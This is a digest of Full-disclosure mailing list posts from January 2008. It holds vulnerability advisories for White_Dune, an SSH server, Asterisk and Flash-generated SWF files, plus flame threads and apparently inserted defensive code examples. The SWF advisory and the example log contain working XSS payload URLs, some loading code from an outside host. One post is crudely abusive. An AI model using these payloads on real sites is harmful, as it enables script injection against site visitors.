> and VM and MVS were a mixture of assembler and (later on) PL/S.  No C knowledge
> needed for those critters...
>
> Even when the system *is* written in C, you don't need to be a C guru to
> understand what's going on. Maurice Bach's "The Design of the Unix Operating
> System" is probably one of the classic texts - but you don't need to know C any
> better than "read C code snippet as pseudocode" to follow it.
>

Re: [Full-disclosure] Was secreview crap - now OpenVMS!!

2008-01-02 Thread reepex
it's funny how you always talk about other people ( like a few days ago when
you were amazed that people exploited an off by one ), and talk about "the
old times"... sure signs of someone washed up as evident by your
non-productiveness in the last few years ( and no - spamming mailing lists
does not count )

On Jan 2, 2008 1:32 PM, <[EMAIL PROTECTED]> wrote:

> On Wed, 02 Jan 2008 14:13:48 EST, "Randal T. Rioux" said:
>
> > OpenVMS is less than 40% Blissful...
>
> Obviously, it's migrated over the years.  Back in the late 80's when it
> was at its most prevalent (and before it got 'Open' attached to it - we're
> talking Big Grey Wall and Big Orange Wall era here), it was pretty heavily
> Bliss32..
>
> > Security relevance: UNHACKABLE! 
>
> WANK! (The old-timers will know what that means, and it's not what you newbies
> think... ;)

[Full-disclosure] Buffer-overflow and format string in White_Dune 0.29beta791

2008-01-02 Thread Luigi Auriemma

###

                             Luigi Auriemma

Application:  White_Dune
              http://vrml.cip.ica.uni-stuttgart.de/dune/
Versions:     <= 0.29beta791
Platforms:    Unix/Linux/MacOSX and Windows
Bugs:         A] buffer-overflow in Scene::errorf
              B] format string in ImportFile
Exploitation: local
Date:         02 Jan 2008
Author:       Luigi Auriemma
              e-mail: [EMAIL PROTECTED]
              web:    aluigi.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===
1) Introduction
===


White_Dune is an open source editor/viewer for the VRML97 files.


###

===
2) Bugs
===

---
A] buffer-overflow in Scene::errorf
---

A buffer-overflow vulnerability is located in the function which builds
the error messages for the problems happened during the parsing of the
WRL file.

From Scene.cpp:

void
Scene::errorf(const char *fmt, ...)
{
    va_list ap;
    char buf[1024], buf2[1024];
    const char *url = "";

    va_start(ap, fmt);
    vsprintf(buf, fmt, ap);
    if (TheApp->getImportURL() != NULL)
        url = TheApp->getImportURL();
    mysnprintf(buf2, 1024, "%s %d: %s", url, lineno, buf);
    _compileErrors += buf2;
}


--
B] format string in ImportFile
--

Another problem related to the handling of the errors.
After the building of the error message the parse() function returns
immediately and swDebugf() is called for visualizing it to stderr or to
the debugger without using the needed format argument required by the
function.

From DuneApp.cpp:

DuneApp::ImportFile(const char *openpath, Scene* scene, bool protoLibrary,
                    Node *node, int field)
...
    if (errors[0]) {
        swMessageBox(_mainWnd, errors, "Parse Errors", SW_MB_OK, SW_MB_WARNING);
        swDebugf(errors);
...


###

===
3) The Code
===


http://aluigi.org/poc/whitedunboffs.zip


###

==
4) Fix
==


Version 0.29beta795


###


--- 
Luigi Auriemma
http://aluigi.org


[Full-disclosure] Multiple vulnerabilities in Georgia SoftWorks SSH2 Server 7.01.0003

2008-01-02 Thread Luigi Auriemma

###

                             Luigi Auriemma

Application:  Georgia SoftWorks SSH2 Server (GSW_SSHD)
              http://www.georgiasoftworks.com/prod_ssh2/ssh2_server.htm
Versions:     <= 7.01.0003
Platforms:    Windows
Bugs:         A] format string in the log function
              B] buffer-overflow in the log function
              C] buffer-overflow in the handling of the password
Exploitation: remote
Date:         02 Jan 2008
Author:       Luigi Auriemma
              e-mail: [EMAIL PROTECTED]
              web:    aluigi.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===
1) Introduction
===


GSW_SSHD is a well known commercial SSH server which acts as SSH tunnel
for the telnet server GS_Tnet.exe.


###

===
2) Bugs
===


A] format string in the log function


The logging function used by the server is affected by a format string
vulnerability caused by the usage of vsprintf for building the first
message (like "LoginPassword(%s(%s)[%u])") and the usage of another
vsprintf for building the final log entry.
The bug can be exploitable through the username field.


--
B] buffer-overflow in the log function
--

A buffer-overflow vulnerability is located in the same logging
function.
It's enough to use an username longer than 1 chars to exploit the
vulnerability.


--
C] buffer-overflow in the handling of the password
--

The server is affected also by another buffer-overflow this time
located in the instructions which handle the password supplied by the
client exploitable through a string longer than 800 chars.


###

===
3) The Code
===


http://aluigi.org/poc/gswsshit.zip


###

==
4) Fix
==


No fix


###


--- 
Luigi Auriemma
http://aluigi.org
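
Both of Luigi Auriemma's advisories above (White_Dune's Scene::errorf with swDebugf(errors), and the GSW_SSHD log function) describe the same two mistakes in an error or log path: an unbounded vsprintf into a fixed buffer, and text that already contains input being passed on as a format string. The C sketch below is an added example, not code from either product or from the advisories; format_error, log_printf, log_line and the sample inputs are assumptions constructed for illustration, with the 1024-byte size taken from the Scene.cpp excerpt.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define ERR_BUF 1024            /* same size as buf/buf2 in the Scene.cpp excerpt */

static char last_line[ERR_BUF]; /* hypothetical log sink: keeps the last line written */

/*
 * Bounded counterpart of the errorf() pattern (hypothetical helper).
 * Returns 0 if the whole message fit, 1 if it was truncated, -1 on a
 * formatting error or bad arguments. Output is NUL-terminated when outsz > 0.
 */
static int format_error(char *out, size_t outsz, const char *url, int lineno,
                        const char *fmt, ...)
{
    char msg[ERR_BUF];
    va_list ap;
    int n, m, truncated;

    if (out == NULL || outsz == 0 || fmt == NULL)
        return -1;

    va_start(ap, fmt);
    /* vsnprintf writes at most sizeof msg bytes; vsprintf has no limit at all. */
    n = vsnprintf(msg, sizeof msg, fmt, ap);
    va_end(ap);
    if (n < 0) { out[0] = '\0'; return -1; }
    truncated = ((size_t)n >= sizeof msg);

    m = snprintf(out, outsz, "%s %d: %s", url ? url : "", lineno, msg);
    if (m < 0) { out[0] = '\0'; return -1; }
    if ((size_t)m >= outsz)
        truncated = 1;
    return truncated;
}

/* printf-style sink, standing in for swDebugf() or a second-stage vsprintf. */
static const char *log_printf(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(last_line, sizeof last_line, fmt, ap);
    va_end(ap);
    return last_line;
}

/*
 * Second stage done safely: the finished message is an argument to a constant
 * "%s" format, so any '%' characters it carries are copied, not interpreted.
 * The pattern in the advisories is the equivalent of log_printf(message).
 */
static const char *log_line(const char *message)
{
    return log_printf("%s", message);
}

int main(void)
{
    char out[ERR_BUF];
    char token[5000];                       /* constructed oversized input */
    int t;

    memset(token, 'A', sizeof token - 1);
    token[sizeof token - 1] = '\0';

    t = format_error(out, sizeof out, "scene.wrl", 7, "unknown node %s", token);
    printf("truncated=%d stored=%lu bytes\n", t, (unsigned long)strlen(out));

    /* constructed input that contains conversion specifiers */
    format_error(out, sizeof out, "scene.wrl", 9, "unknown node %s", "%x%x%s");
    printf("logged: %s\n", log_line(out));
    return 0;
}
```

The truncation flag matters for logging: a caller can record that a message was cut instead of silently storing a shortened line.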


Re: [Full-disclosure] Secreview re-review of quietmove ( F ---)

2008-01-02 Thread Tremaine Lea
Regardless of whether your intentions are good or not in performing
these reviews, one thing is crystal clear.  In order to perform these
reviews and have them accepted by those who would actually read and
depend on them to a degree, you need to have established yourself as a
credible source and have a good reputation.

With that in mind, I think the vast majority will continue to rely on
word of mouth from peers, or well respected and long standing
companies such as Gartner or even Dark Reading.  In my not so humble
opinion, you will not establish yourself as a credible resource by
engaging in petty disputes and mud slinging on FD.

Worse, it becomes more and more apparent that this is essentially an
attempt to drive interest to your blog.  I don't believe any serious
company would engage in the behaviour you have to date, so both your
motives and your method are in question.  If you genuinely wish to be
taken seriously and treated as a credible source of information about
other security vendors, I'd consider starting again from scratch and
develop a better method of attracting professional interest.  The key
is to attract the attention, not try and push your product down
throats.

Another quick lesson : if a vendor doesn't provide you with
information, the correct thing to do is simply note that you were
unable to review their product or services, and why.  To still attempt
a review with seriously incomplete information and then give a low
score is irresponsible at best.

-- 
Tremaine Lea
Network Security Consultant
Intrepid ACL
"Paranoia for hire"

On Jan 2, 2008 11:08 AM, SecReview <[EMAIL PROTECTED]> wrote:
> Hi Adam,
>
> We've said this before and will say this again, this time to
> everyone.
>
> We would be more than happy to give your company (QuietMove) a
> "better" review if you'd enable us to do that. So far you haven't
> helped us to effectively review you at all. We tried to call you
> before our initial review, but never got hold of anyone. We also
> sent you an email before writing our second review, and you never
> responded to any of the questions in that email. If you'd like us
> to do a better review then provide us with the information that you
> think we will need to get the job done.
>
> Our current review is the product of your website, emails that
> you've posted to this and other forums, and your reaction to our
> first review. We haven't been able to find anything related to
> major accomplishments by you or by QuietMove, we haven't seen any
> sample reports, and we haven't received any answers to any
> questions about your methodologies for service execution and
> delivery. We even think that our current review might be too harsh,
> but can't change anything without more information.
>
> If you want us to change our review, we can do that again and we
> can do it in a non-biased way (regardless of all the rants and
> noise). We need you to tell us about your service delivery
> methodologies, your reporting methodologies, how you define
> specific service offerings, what markets you play in, and if
> possible sanitized sample reports. We won't publish any of that
> information directly, but we would use that to produce your next
> review.
>
> We want our reviews to accurately and truthfully reflect the
> quality and professionalism of the providers that we study. (In
> fact, if anyone has any suggestions as to how we could better
> "rank" security companies we'd be more than happy to listen and
> consider those suggestions.)
>
> Hope this helps. This will be our last email about QuietMove unless
> you request a redo of the current review. We will only redo the
> review if you are able to provide us with accurate information to
> help us get it done. We think that you should do it, because we
> think that you can score much better than an F+. (You're clearly
> not an idiot and you do have at least some experience.)
>
> -the end.
>
>
>
>
> Regards,
>   The Secreview Team
>   http://secreview.blogspot.com


Re: [Full-disclosure] Secreview re-review of quietmove ( F ---)

2008-01-02 Thread Nate McFeters
Is anyone out there using these reviews?  It's just amazing that we are
still going through this.  SecReview is busting Adam for not credentializing
himself, but I see nothing of how they have credentialized what they are
doing.  It's absurd.

On 1/2/08, Tremaine Lea <[EMAIL PROTECTED]> wrote:
>
> Regardless of whether your intentions are good or not in performing
> these reviews, one thing is crystal clear.  In order to perform these
> reviews and have them accepted by those who would actually read and
> depend on them to a degree, you need to have established yourself as a
> credible source and have a good reputation.
>
> With that in mind, I think the vast majority will continue to rely on
> word of mouth from peers, or well respected and long standing
> companies such as Gartner or even Dark Reading.  In my not so humble
> opinion, you will not establish yourself as a credible resource by
> engaging in petty disputes and mud slinging on FD.
>
> Worse, it becomes more and more apparent that this is essentially an
> attempt to drive interest to your blog.  I don't believe any serious
> company would engage in the behaviour you have to date, so both your
> motives and your method are in question.  If you genuinely wish to be
> taken seriously and treated as a credible source of information about
> other security vendors, I'd consider starting again from scratch and
> develop a better method of attracting professional interest.  The key
> is to attract the attention, not try and push your product down
> throats.
>
> Another quick lesson : if a vendor doesn't provide you with
> information, the correct thing to do is simply note that you were
> unable to review their product or services, and why.  To still attempt
> a review with seriously incomplete information and then give a low
> score is irresponsible at best.
>
> --
> Tremaine Lea
> Network Security Consultant
> Intrepid ACL
> "Paranoia for hire"
>
> On Jan 2, 2008 11:08 AM, SecReview <[EMAIL PROTECTED]> wrote:
> > Hi Adam,
> >
> > We've said this before and will say this again, this time to
> > everyone.
> >
> > We would be more than happy to give your company (QuietMove) a
> > "better" review if you'd enable us to do that. So far you haven't
> > helped us to effectively review you at all. We tried to call you
> > before our initial review, but never got hold of anyone. We also
> > sent you an email before writing our second review, and you never
> > responded to any of the questions in that email. If you'd like us
> > to do a better review then provide us with the information that you
> > think we will need to get the job done.
> >
> > Our current review is the product of your website, emails that
> > you've posted to this and other forums, and your reaction to our
> > first review. We haven't been able to find anything related to
> > major accomplishments by you or by QuietMove, we haven't seen any
> > sample reports, and we haven't received any answers to any
> > questions about your methodologies for service execution and
> > delivery. We even think that our current review might be too harsh,
> > but can't change anything without more information.
> >
> > If you want us to change our review, we can do that again and we
> > can do it in a non-biased way (regardless of all the rants and
> > noise). We need you to tell us about your service delivery
> > methodologies, your reporting methodologies, how you define
> > specific service offerings, what markets you play in, and if
> > possible sanitized sample reports. We won't publish any of that
> > information directly, but we would use that to produce your next
> > review.
> >
> > We want our reviews to accurately and truthfully reflect the
> > quality and professionalism of the providers that we study. (In
> > fact, if anyone has any suggestions as to how we could better
> > "rank" security companies we'd be more than happy to listen and
> > consider those suggestions.)
> >
> > Hope this helps. This will be our last email about QuietMove unless
> > you request a redo of the current review. We will only redo the
> > review if you are able to provide us with accurate information to
> > help us get it done. We think that you should do it, because we
> > think that you can score much better than an F+. (You're clearly
> > not an idiot and you do have at least some experience.)
> >
> > -the end.
> >
> >
> >
> >
> > Regards,
> >   The Secreview Team
> >   http://secreview.blogspot.com

Re: [Full-disclosure] Uber Lamer Ass of the Year. Vote!

2008-01-02 Thread worried security
On Dec 24, 2007 4:59 AM, damncon <[EMAIL PROTECTED]> wrote:
>  I'm still wondering which are n3td3v main skills, and I am not
> joking, I have only seen him posting links to government news, security
> news, etc.
>
> What does really happen in n3td3v user group or whatever it is called.

We talk about things your mom wouldn't approve of and I'm not letting
you sign up, na na na.


Re: [Full-disclosure] Was secreview crap - now OpenVMS!!

2008-01-02 Thread Valdis . Kletnieks
On Wed, 02 Jan 2008 13:48:13 CST, you said:

> it's funny how you always talk about other people ( like a few days ago when
> you were amazed that people exploited an off by one ),

Actually, I was merely pointing out to a reader of the list that if you *can*
get x'41414141' into the appropriate register, you can probably abuse it into a
full exploit, and gave an example of an off-by-one-byte that produced such an
exploit.  Maybe in that reader's world, they can get away with asking "how is
that exploitable?", but some of us have to classify that as "should be
considered exploitable until proved otherwise".

>, and talk about "the
> old times"... sure signs of someone washed up as evident by your
> non-productiveness in the last few years

Failure to learn from the lessons of the past is a good way to shoot yourself
in the foot exactly the same way.  Yes - WANK was back in 1989.  However, even
now, almost 2 decades later, we're *still* seeing a lot of systems getting
exploited for the *exact same* base cause.

Additionally, it's proof that anybody who is just *now* waking up to the
concept of "cyber-warfare" is 20 years behind:

http://marc.info/?l=isn&m=100707930117213&w=2

It's also a good idea to keep in mind that not everybody in the security
industry measures "productivity" by "number of exploits published".  For some
of us who run production networks, "no incidents happened, and none of the
users noticed a damned thing we did to ensure it" is the rarely attained
Nirvana.



[Full-disclosure] AST-2008-001: Crash from transfer using BYE with Also header

2008-01-02 Thread Asterisk Security Team
Asterisk Project Security Advisory - AST-2008-001

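+------------------------------------------------------------------------+
| Product             | Asterisk                                         |
|---------------------+--------------------------------------------------|
| Summary             | Remote Crash Vulnerability in SIP channel driver |
|---------------------+--------------------------------------------------|
| Nature of Advisory  | Denial of Service                                |
|---------------------+--------------------------------------------------|
| Susceptibility      | Remote Unauthenticated Sessions                  |
|---------------------+--------------------------------------------------|
| Severity            | Critical                                         |
|---------------------+--------------------------------------------------|
| Exploits Known      | No                                               |
|---------------------+--------------------------------------------------|
| Reported On         | December 26, 2007                                |
|---------------------+--------------------------------------------------|
| Reported By         | Grey VoIP (bugs.digium.com user greyvoip)        |
|---------------------+--------------------------------------------------|
| Posted On           | January 2, 2008                                  |
|---------------------+--------------------------------------------------|
| Last Updated On     | January 2, 2008                                  |
|---------------------+--------------------------------------------------|
| Advisory Contact    | Joshua Colp <[EMAIL PROTECTED]>                  |
|---------------------+--------------------------------------------------|
| CVE Name            |                                                  |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Description | The handling of the BYE with Also transfer method was    |
|             | broken during the development of Asterisk 1.4. If a      |
|             | transfer attempt is made using this method the system    |
|             | will immediately crash upon handling the BYE message due |
|             | to trying to copy data into a NULL pointer. It is        |
|             | important to note that a dialog must have already been   |
|             | established and up in order for this to happen.          |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Resolution | A fix has been added so that the BYE with Also transfer   |
|            | method now properly allocates and uses the transfer data  |
|            | structure. It will no longer try to copy data into a NULL |
|            | pointer and will operate properly.                        |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
|                           Affected Versions                            |
|------------------------------------------------------------------------|
| Product                    | Release     |                             |
|                            | Series      |                             |
|----------------------------+-------------+-----------------------------|
| Asterisk Open Source       | 1.0.x       | Unaffected                  |
|----------------------------+-------------+-----------------------------|
| Asterisk Open Source       | 1.2.x       | Unaffected                  |
|----------------------------+-------------+-----------------------------|
| Asterisk Open Source       | 1.4.x       | All versions prior to       |
|                            |             | 1.4.17                      |
|----------------------------+-------------+-----------------------------|
| Asterisk Business Edition  | A.x.x       | Unaffected                  |
|----------------------------+-------------+-----------------------------|
| Asterisk Business Edition  | B.x.x       | Unaffected                  |
|----------------------------+-------------+-----------------------------|
| Asterisk Business Edition  | C.x.x       | All versions prior to       |
|                            |             | C.1.0-beta8                 |
|----------------------------+-------------+-----------------------------|
| AsteriskNOW                | pre-release | All versions prior to beta7 |
|----------------------------+-------------+-----------------------------|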
| Asterisk Appliance  

[Full-disclosure] January 4th Chicago 2600 Meeting Information

2008-01-02 Thread Steven McGrath
The January Chicago 2600/DefCon 312 Meeting is near! The meeting will be
Friday, January 4th at the Neighborhood Boys and Girls Club and will feature
much of the same usual fun that all of you have grown to expect!


REQUIREMENTS:
* Laptop (Mac/Linux/Windows) capable of running VMWare
OR
* Laptop with full Ruby on Rails and ruby-sqllite3 installed.


[Presentation Information]
- 9:00pm - Distributed Nmap: How to Automate Scans for an Environment
- Tentative - Jax By Jaku
- After hours - Wii, Music, Socializing, etc.

[General Information]
- Meeting Time: 7.00pm - Approx. 3-5am
- Meeting Date: Friday, January 4th
- Place : 2501 W Irving Park Road, Chicago
- More Info : http://chicago2600.net


[Full-disclosure] Critical Vulnerability in [Full-Disclosure]

2008-01-02 Thread 31415926
Critical Vulnerability in [Full-Disclosure]

The problem with full disclosure is that everyone feels the need to 
fully disclose, even when their opinion and the information they 
are purporting to impart is, well, bollocks. You can't tell them to 
shut up as they think they're important and the internet gives them 
balls of steel and verbal diarrhoea, so we stumble from one tired 
flamewar to another with no useful content being published.

It's embarrassing.

I'm an advocate of FD as a concept. I believe that there is no such 
thing as an innocent on the internet and if you really are that 
dumb, then you deserve everything you get. FD (as one of many like-
minded lists) forces the vendors to patch or die and eventually 
write quality code. FD (the concept, not the list) is the ultimate 
nuclear deterrent, without the mutually assured destruction lunacy.

I have watched the posters to this list for some time. By far the 
vast majority are transparently kiddies, sitting on their painted-
up laptops thinking of themselves as the techno-brats in the film 
"Hackers" and hoping to grow up to be like the guy in the film 
"Swordfish". They write in l33t5p34k and think that this somehow 
makes them informed. Kiddies are the lowest form of life in the 
hierarchy of information security and in the IT industry generally.

You know who you are and so does everyone else. You are fools, and 
an embarrassment to the craft:
Secreview (review of products/services you have never bought, are 
you the goatse.cz receiver?)
Reepex (Isn't a reepex a bit of farm machinery?)
Gobbles (A nickname for a gay male prostitute)
Morning Wood (The holy grail of the viagra-abuser)
Gmaggro ("high value target selection", are you completely cocking 
stupid?)

Oh, the outrage.

I can see it now. there will be armies of skiddies demanding that 
the l33tz hack this [EMAIL PROTECTED], spam him, pwn him, and post defamatory 
messages concerning her skills and possible employment 
opportunities for her and her mother everywhere possible. Guess 
what, kids? I don't care.

No, not even a little bit. Do what you like, I could care less and 
no one else cares if you live or die tonight, you sad, acne'd 
little dewdrops.

Calmed down yet?

Good. I want you to consider something.

The FD list consists of the following content (and what it has to 
say):

Advisories by vendors (we fixed this)
Advisories by individuals (I tested that and found this)
Advisories by infosec organisations (we found this)
Funnies (self explanatory)
Opinions (this sucks, what about that?)
Skids (I did this, aren't I great, everyone else sucks?)
Trolls (you suck)
Trawlers (I have something 0day to buy or sell)

The top three (ie the useful content) is available in any one of a 
hundred places, the bottom three are noise. The only people 
interested in the noise are those who keep track of it for a 
living.

So, consider that by posting anything in the bottom three 
categories, you are drawing the attention of those who take an 
interest in your sad efforts to destabilise the technical crutch of 
society. These people are better than you in every important way, 
and if you so much as tiptoe across one of their lines, you'll wind 
up sharing a cell with a 7ft gorilla called george with a dead 
mouse and a pressing need to dry-cornhole your ringpiece 3 times a 
night and twice on sundays. Do yourselves a favour and STFU.

What's left?

The funnies and the opinions. I've laughed my tits off at posts by 
Messrs Coderman, Diggle, Dripping, VanWinkle and Mengele, and I've 
been interested by a few others who will remain nameless as I can't 
list them all. Long live full disclosure, but keep in mind that 
you're only legends in your own bedrooms.

later, pi



[Full-disclosure] XSS Vulnerabilities in Common Shockwave Flash Files

2008-01-02 Thread rich cannings
Hi.

Recently, there has been news regarding Flash authoring tools and XSS,
but the articles contained little technical information. So, I created
a detailed report at:

http://docs.google.com/Doc?docid=ajfxntc4dmsq_14dt57ssdw

An abbreviated version intended for full-disclosure, bugtraq, and
websecurity lists is below.


SUMMARY

Critical vulnerabilities exist in a large number of widely used web
authoring tools that automatically generate Shockwave Flash (SWF)
files, such as Adobe (r) Dreamweaver (r), Adobe Acrobat (r) Connect
(tm) (formerly Macromedia Breeze), InfoSoft FusionCharts, and
Techsmith Camtasia. The flaws render websites that host these
generated SWF files vulnerable to Cross-Site Scripting (XSS).

This problem is not limited to authoring tools. Autodemo, a popular
service provider, used a vulnerable controller SWF in many of their
projects.

Simple Google hacking queries reveal that hundreds of thousands of
SWFs are vulnerable on the Internet, and a considerable percentage of
major Internet sites are affected. We are only reporting XSS
vulnerabilities that have been fixed by the vendors.


THE PROBLEM

Many web authoring tools that automatically generate SWFs insert
identical and vulnerable ActionScript into all saved SWFs or necessary
controller SWFs (think of tools that "save as SWF", "export to SWF",
etc.). The vulnerable ActionScript can be used by attackers to execute
arbitrary JavaScript in the security domain of the website hosting the
SWF.

We were unable to perform an exhaustive review of all authoring tools
that generate SWFs. More XSS issues may exist in the products listed
below and certainly exist in other applications that save to SWF.

We are only reporting XSS vulnerabilities that have been fixed by the
vendors. There are more products vulnerable. We will publish more
information when the vendor releases fixes.

Adobe Dreamweaver

The "skinName" parameter is accepted by all Flash files produced by
the "Insert Flash Video" feature. "skinName" can be used to force
victims to load arbitrary URLs including the "asfunction" protocol
handler:

http://www.example.com/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//

Adobe was contacted on August 8, 2007. This issue was fixed in the
December Flash player release.

Adobe Acrobat Connect/Macromedia Dreamweaver

"main.swf" is the controller file in all Connect/Breeze online
presentations. This SWF does not properly validate the "baseurl"
parameter; thus causing script injection:

http://www.example.com/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//

Adobe was contacted on July 31, 2007. This issue was fixed in the
December Flash player release.

InfoSoft FusionCharts

One of the issues found in FusionCharts was that the "dataURL"
parameter allows insertion of arbitrary HTML into a "TextArea"
instance. This allows attackers to load SWFs from other domains:

http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//cannings.org/DoKnowEvil.swf%3F.jpg%22%3E

InfoSoft was contacted on September 2, 2007. Fixes for all issues we
found were released in late September. Webmasters should consult
InfoSoft to properly upgrade their SWFs. See "The Fix" for details.

Techsmith Camtasia

One of the issues found in Camtasia was that the "csPreloader"
parameter loads an arbitrary flash file:

http://www.example.com/Example_controller.swf?csPreloader=http://cannings.org/DoKnowEvil.swf%3f

Techsmith was contacted on August 12, 2007. Fixes for all issues were
released in late September. Webmasters should contact Techsmith to
properly upgrade their SWFs. See "The Fix" for details.

Autodemo

Autodemo is a service provider, not an authoring tool. However, like
authoring tools they use a common control file in many demos. The
"onend" parameter in "control.swf" loads arbitrary URLs including the
JavaScript protocol handler:

http://www.example.com/control.swf?onend=javascript:alert(1)//

Autodemo was contacted on August 17, 2007. Autodemo was extremely
responsive to our report and quickly fixed the issue in early
September. Webmasters must update to the latest "control.swf". See
"The Fix" for details.

Autodemo is not the only service provider to have XSS in their
products. They are just the only service provider we looked at.
Readers should be concerned about other service providers who don't
even know their SWFs are vulnerable.


THE FIX

See http://docs.google.com/Doc?docid=ajfxntc4dmsq_14dt57ssdw.


CREDITS

First and foremost, we thank Stefano Di Paola of Minded Security and
Obscure of EyeonSecurity who thoroughly researched and pioneered every
attack we used.

Thanks to Autodemo, Infosoft, and Techsmith for quickly fixing this
issue. We also thank the Computer Emergency Response Team for
coordinating with the vendors to fix this issue, the Adobe Flash
player development teams for including some fixes in the player (we
hope to see more in the future), the Adobe Software Security
Engineering Team
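
A defender's view of the advisory above, as an added example that is not part of the original post: a Python check that scans web-server access-log lines for requests to .swf files whose query parameters carry an "asfunction:" or "javascript:" scheme, HTML markup, or an off-site URL. The log lines are constructed from the advisory's own example URLs; the function names, reason labels, log format (Common Log Format) and client addresses are assumptions, and the scan covers every query parameter rather than only the five the advisory names.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter names taken from the advisory, compared case-insensitively.
ADVISORY_PARAMS = {"skinname", "baseurl", "dataurl", "cspreloader", "onend"}
SCRIPT_SCHEMES = ("asfunction:", "javascript:")
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[0-9.]+"')


def classify_value(value, site_host):
    """Return a reason label if a decoded parameter value is risky, else None."""
    # Whitespace and control characters are dropped before the scheme test,
    # so " JavaScript:" is classified the same way as "javascript:".
    flat = re.sub(r"[\x00-\x20]", "", value).lower()
    if flat.startswith(SCRIPT_SCHEMES):
        return "script-scheme"
    # Deliberately broad: quotes and angle brackets have no place in a URL value.
    if re.search(r"[<>\"']", value):
        return "markup"
    if re.match(r"(?:[a-z][a-z0-9+.-]*:)?//", flat):
        try:
            host = urlsplit(flat).hostname
        except ValueError:
            return "unparseable-url"
        if host and host != site_host.lower():
            return "off-site-url"
    return None


def scan_access_log(lines, site_host):
    """Return one finding per risky query parameter on a request for a .swf."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        try:
            target = urlsplit(match.group(1))
        except ValueError:
            continue
        if not target.path.lower().endswith(".swf"):
            continue
        # parse_qsl percent-decodes values and turns "+" into a space.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            reason = classify_value(value, site_host)
            if reason:
                findings.append({
                    "line": number, "path": target.path, "param": name,
                    "reason": reason,
                    "in_advisory": name.lower() in ADVISORY_PARAMS,
                })
    return findings


# Constructed sample log: request targets reuse the advisory's example URLs,
# client addresses and timestamps are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Jan/2008:10:01:11 +0000] "GET /FLVPlayer_Progressive.swf?skinName=Clear_Skin_1&streamName=intro HTTP/1.1" 200 9120',
    '203.0.113.9 - - [02/Jan/2008:10:02:40 +0000] "GET /FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)// HTTP/1.1" 200 9120',
    '198.51.100.4 - - [02/Jan/2008:10:03:02 +0000] "GET /main.swf?baseurl=asfunction:getURL,javascript:alert(1)// HTTP/1.1" 200 40110',
    '198.51.100.4 - - [02/Jan/2008:10:03:55 +0000] "GET /Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//cannings.org/DoKnowEvil.swf%3F.jpg%22%3E HTTP/1.1" 200 7731',
    '192.0.2.33 - - [02/Jan/2008:10:04:19 +0000] "GET /Example_controller.swf?csPreloader=http://cannings.org/DoKnowEvil.swf%3f HTTP/1.1" 200 5512',
    '192.0.2.33 - - [02/Jan/2008:10:05:00 +0000] "GET /control.swf?onend=javascript:alert(1)// HTTP/1.1" 200 2048',
    '203.0.113.7 - - [02/Jan/2008:10:06:30 +0000] "GET /Example.swf?dataURL=http://www.example.com/Data.xml HTTP/1.1" 200 7731',
    '203.0.113.7 - - [02/Jan/2008:10:07:01 +0000] "GET /index.html?next=javascript:alert(1) HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG, "www.example.com"):
        print(finding)
```

Only parameters that reach the request line are visible to this check; values passed to a SWF through FlashVars in the embedding page or in a POST body never appear in an access log.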

Re: [Full-disclosure] Secreview re-review of quietmove ( F ---)

2008-01-02 Thread Lyal Collins
I'd add to this that anyone who buys security consulting/pen test services
et al solely on the basis of web site content is unlikely to get any
worthwhile outcomes for their specific needs. 

No effective manager in any company/government I've seen is going to refer
to a web site alone, or to bother finding obscure posts on a specialist
mailing list that may or may not be relevant to their needs - they merely
use web sites as a source of potential suppliers before interviewing them,
and getting references.

Let's kill this pointless waste of inbox space, please.
lyalc


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Tremaine Lea
Sent: Thursday, 3 January 2008 6:05 AM
To: SecReview
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Secreview re-review of quietmove ( F ---)


Regardless of whether your intentions are good or not in performing these
reviews, one thing is crystal clear.  In order to perform these reviews and
have them accepted by those who would actually read and depend on them to a
degree, you need to have established yourself as a credible source and have
a good reputation.

With that in mind, I think the vast majority will continue to rely on word
of mouth from peers, or well respected and long standing companies such as
Gartner or even Dark Reading.  In my not so humble opinion, you will not
establish yourself as a credible resource by engaging in petty disputes and
mud slinging on FD.

Worse, it becomes more and more apparent that this is essentially an attempt
to drive interest to your blog.  I don't believe any serious company would
engage in the behaviour you have to date, so both your motives and your
method are in question.  If you genuinely wish to be taken seriously and
treated as a credible source of information about other security vendors,
I'd consider starting again from scratch and develop a better method of
attracting professional interest.  The key is to attract the attention, not
try and push your product down throats.

Another quick lesson: if a vendor doesn't provide you with information, the
correct thing to do is simply note that you were unable to review their
product or services, and why.  To still attempt a review with seriously
incomplete information and then give a low score is irresponsible at best.

-- 
Tremaine Lea
Network Security Consultant
Intrepid ACL
"Paranoia for hire"

On Jan 2, 2008 11:08 AM, SecReview <[EMAIL PROTECTED]> wrote:
> Hi Adam,
>
> We've said this before and will say this again, this time to everyone.
>
> We would be more than happy to give your company (QuietMove) a 
> "better" review if you'd enable us to do that. So far you haven't 
> helped us to effectively review you at all. We tried to call you 
> before our initial review, but never got hold of anyone. We also sent 
> you an email before writing our second review, and you never responded 
> to any of the questions in that email. If you'd like us to do a better 
> review then provide us with the information that you think we will 
> need to get the job done.
>
> Our current review is the product of your website, emails that you've 
> posted to this and other forums, and your reaction to our first 
> review. We haven't been able to find anything related to major 
> accomplishments by you or by QuietMove, we haven't seen any sample 
> reports, and we haven't received any answers to any questions about 
> your methodologies for service execution and delivery. We even think 
